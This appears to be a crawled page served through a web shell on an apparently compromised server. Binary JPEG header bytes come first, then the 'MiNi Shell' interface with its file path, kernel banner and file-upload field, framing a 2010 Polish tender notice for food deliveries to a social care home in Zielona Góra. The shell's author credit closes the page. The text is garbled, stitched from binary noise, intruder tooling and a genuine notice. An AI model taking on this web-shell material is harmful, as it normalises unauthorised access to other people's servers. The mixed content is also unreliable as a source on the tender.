JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100204/31752-N-2010.html

<p class="kh_header"><b>Zielona Góra: Sukcesywne dostawy artykułów żywnościowych na potrzeby Domu Pomocy Społecznej w Zielonej Górze w okresie 12 m-cy od 1.03.2010r.</b><br>
<b>Numer ogłoszenia: 31752 - 2010; data zamieszczenia: 04.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , Al. Słowackiego 29, 65-326 Zielona Góra, woj. lubuskie, tel. 068 3202064, 3205718, faks 068 3200812.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dps.bipzielonagora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy artykułów żywnościowych na potrzeby Domu Pomocy Społecznej w Zielonej Górze w okresie 12 m-cy od 1.03.2010r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy artykułów żywnościowych na potrzeby Domu Pomocy Społecznej w Zielonej Górze w okresie 12 m-cy od 1.03.2010r.
Szczegółowy opis zamówienia zawierają załączniki nr 2 do Specyfikacji Istotnych Warunków Zamówienia.
części zamówienia	nazwa części	kod CPV
ZAKRES   I	artykuły ogólnospożywcze	15800000-6
ZAKRES  II	mięsa i wyroby wędliniarskie	15110000-2,  15131120-2	
ZAKRES  III	artykuły mleczarskie	15500000-3
ZAKRES  IV	ryby	15200000-0
ZAKRES  V	mrożonki	15331100-8
ZAKRES VI	pieczywo	15811000-6
ZAKRES VII	jaja	03142500-3

Oferowane artykuły spożywcze muszą być dobrej jakości, posiadać wymagane prawem atesty dopuszczające żywność do spożycia, muszą posiadać przy dostawie metkę z widoczną datą produkcji, składem produktu i terminem przydatności do spożycia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.11.00.00-2, 15.13.11.20-2, 15.50.00.00-3, 15.20.00.00-0, 15.33.11.00-8, 15.81.10.00-6, 03.14.25.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku będzie oceniane zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.Oświadczenie, że Wykonawca posiada stosowne atesty lub świadectwa na artykuły żywnościowe wymienione w załączniku nr 2, dopuszczające do spożycia zgodnie z  obowiązującymi przepisami. 
2.W celu potwierdzenia, że oferowane dostawy odpowiadają określonym wymaganiom należy przedłożyć:
Zaświadczenie podmiotu uprawnionego do kontroli jakości, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym, a w szczególności:
a) Aktualne zaświadczenie właściwej miejscowo Państwowej Inspekcji Sanitarnej, lub Inspekcji Weterynaryjnej, że Wykonawca podlega stałemu nadzorowi tej Inspekcji, zgodnie z Ustawą z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. Nr 171 z dnia 27 września 2006 roku, poz. 1225), 
b) Oświadczenie, że wykonawca posiada aktualne zezwolenie właściwego Powiatowego Lekarza Weterynarii na prowadzenie usług transportowych w zakresie przewozu żywności pochodzenia zwierzęcego (zgodnie z ustawą z 16 grudnia 2005 roku o produktach pochodzenia zwierzęcego) lub aktualne zezwolenie właściwego Państwowego Inspektora Sanitarnego (Sanepidu) na prowadzenie usług transportowych w zakresie przewozu żywności (zgodnie z ustawą z dnia 25 sierpnia 2006 roku o bezpieczeństwie żywności i żywienia).</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.   Aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.  Do oferty należy dołączyć stosowne pełnomocnictwo w przypadku osób upoważnionych do reprezentowania firmy a nie wymienionych w dokumencie rejestracyjnym (ewidencyjnym) wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dps.bipzielonagora.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej
Al. J. Słowackiego 29
65- 326 Zielona Góra.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2010 godzina 09:00, miejsce: Dom Pomocy Społecznej
Al. J. Słowackiego 29
65- 326 Zielona Góra
sekretariat - pok. nr 04.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakres I: ARTYKUŁY OGÓLNOSPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	wyszczególnienie artykułów	j.m.	ilość
1	chrzan opak. ok.280g.	kg	30
2	cukier w opak. 1 kg	kg	1000
3	cukier waniliowy 16g	szt.	60
4	czosnek granulowany	kg	3
5	ćwikła opak. ok. 300g	kg	15
6	dżemy niskocukrowe: wiśnia, truskawka, cz. porzeczka, owoce leśne- słoiczki ok 300g-Kotlin	kg	200
7	gałka muszkatałowa	kg	1
8	kukurydza konserwowa - 400g	puszka	50
9	groszek konserwowy - 400g	puszka	120
10	herbata expres. Saga opak 100torebek	opak.	200
11	kakao Decomoreno 200g	opak.	90
12	kasza gryczana - opak. 1 kg	kg	50
13	kasza jęczmienna opak 1kg	kg	70
14	kasza manna - opak. 1kg	kg	90
15	kawa zbożowa	kg	160
16	kisiel bez cukru 50g	szt.	120
17	koncentrat pomidorowy Pudliszki lub Kotlin opak.200g	kg	120
18	kwasek cytrynowy 20g	szt	300
19	liść laurowy	kg	2
20	majeranek	kg	2
21	majonez Winiary 400g	kg	150
22	makaron świderki, kolanka Sulma 400g	kg	180
23	makaron nitki Sulma 400g	kg	100
24	mąka pszenna 1 kg	kg	650
25	mąka ziemniaczana 1 kg	kg	60
26	musztarda Stołowa 200g	kg	60
27	olej Kujawski 1 l	l	600
28	papryka słodka - przyprawa 20g	kg	4
29	pasztet drobiowy 160g - Prochowicki	puszka	1000
30	płatki owsiane 400g	kg	90
31	przyprawa Maggi Winiary 5l	l	150
32	ryż 1kg	kg	200
33	sól 1 kg	kg	250
34	suchary bezcukrowe Mamut 285g	paczka	40
35	przyprawa Warzywko 1 kg	kg	60
36	ziele angielskie	kg	3
37	żelatyna spożywcza w torebkach	kg	4
38	płatki ryżowe	kg	70
39	przyprawa do gyrosa 20g	kg	1
40	przyprawa do kurczaka 20g	kg	2
41	pieprz ziołowy 20g	kg	3
42	miód naturalny - opakowania 25g	szt	200
43	konserwa mięsna 160g	szt	1500
44	żur - 0,5 l	szt	70
45	marmolada 600g	kg	150
46	ketchup PUDLISZKI 480ml	szt	25
47	powidła 610g	kg	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakres II: MIĘSO I WYROBY WĘDLINIARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	wyszczególnienie asortymentu	j.m.	ilość
1	filet z kurczaka	kg	140
2	kurczak świeży	kg	500
3	korpusy drobiowe	kg	350
4	wątroba drobiowa	kg	90
5	karkówka b.k	kg	150
6	łopatka wp. b.k	kg	700
7	ozory wp.	kg	100
8	schab b.k	kg	160
9	udka z kurczaka	kg	300
10	żeberka wp.	kg	150
	antrykot	kg	20
11	baleron gotowany	kg	100
12	boczek wędzony	kg	180
13	flaki suche	kg	125
14	golonka wp. peklowana	kg	30
15	kaszanka	kg	100
16	kiełbasa biała parzona	kg	50
17	kiełbasa bydgoska	kg	50
18	kiełbasa domowa	kg	50
19	kiełbasa jałowcowa	kg	90
21	kiełbasa polska surowa	kg	40
22	kiełbasa szynkowa delikatesowa wieprzowa	kg	60
23	kiełbasa szynkowa delikatesowa drobiowa	kg	60
24	kiełbasa śląska	kg	250
25	kiełbasa zwyczajna	kg	120
26	kiełbasa żywiecka drobiowa	kg	50
27	kiełbasa żywiecka wieprzowa	kg	50
28	metka	kg	50
29	mortadela	kg	90
30	ogonówka	kg	100
31	parówki cielęce	kg	120
32	polędwica sopocka	kg	30
33	kiełbasa rzeszowska	kg	50
34	salceson z kurcząt	kg	50
35	salceson ozorkowy	kg	50
37	serdelki wieprzowe	kg	80
38	serdelki z kurcząt	kg	150
	parówki paryskie	kg	100
39	szynka gotowana	kg	40
40	szynka gotowana - myszka	kg	40
41	szynka złota z indyka	kg	40
42	wątrobianka	kg	50
	wędzonka chłopska	kg	70
43	polędwica miodowa	kg	40
44	słonina	kg	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.13.11.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakres III : ARTYKUŁY  MLECZARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	wyszczególnienie	j.m.	ilość
1	mleko 2 %    l	6000
2	mleko w proszku (niebieskie) pełne	kg	100
3	śmietana 12%	l	600
4	maślanka 	l	100
5	twaróg półtłusty	kg	300
6	ser żółty Salami	kg	120
7	masło	kg	1000
8	ser żółty Edamski	kg	150
9	twarożek śniadaniowy 150g	szt.	2400
10	masło roślinne typu Kruszwica w kubku 500g	kg	250
11	kefir 125g	szt	2000
12	drożdże 10g	kg	2
13	ser chochland krążek	op	500
14	serek topiony 100g	kg	100
15	ser fromage	szt	700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zakres IV:  RYBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	wyszczególnienie	j.m.	ilość
1	filet z morszczuka - mrożony - bez glazury	kg	310
2	makrela wędzona 	kg	200
3	filet śledziowy solony matias - opak. 4kg	kg	100
4	makrela w sosie pomidorowym - konserwa 125g 	szt.	800
5	makrela w oleju - konserwa 125g	szt.	500
6	paprykarz 300g	szt	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zakres V:  MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	wyszczególnienie	j.m.	ilość
1	mieszanka kompotowa	kg	600
2	kalafior	kg	300
3	fasolka szparagowa zielona	kg	250
4	bukiet warzyw 	kg	150
5	brukselka	kg	20
6	brokuł	kg	250
7	wiśnie	kg	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zakres VI: PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	wyszczególnienie	j.m.	ilość
1	chleb baltonowski krojony 0,6kg	szt.	11500
3	bułka pszenna  krojona 200g	szt.	2000
4	bułka zwykła mała 50g	szt.	10000
5	chałka 100g.	szt.	1000
6	bułka tarta	kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zakres VII: JAJKA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	jajka świeże klasa wagowa M	szt.	13500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com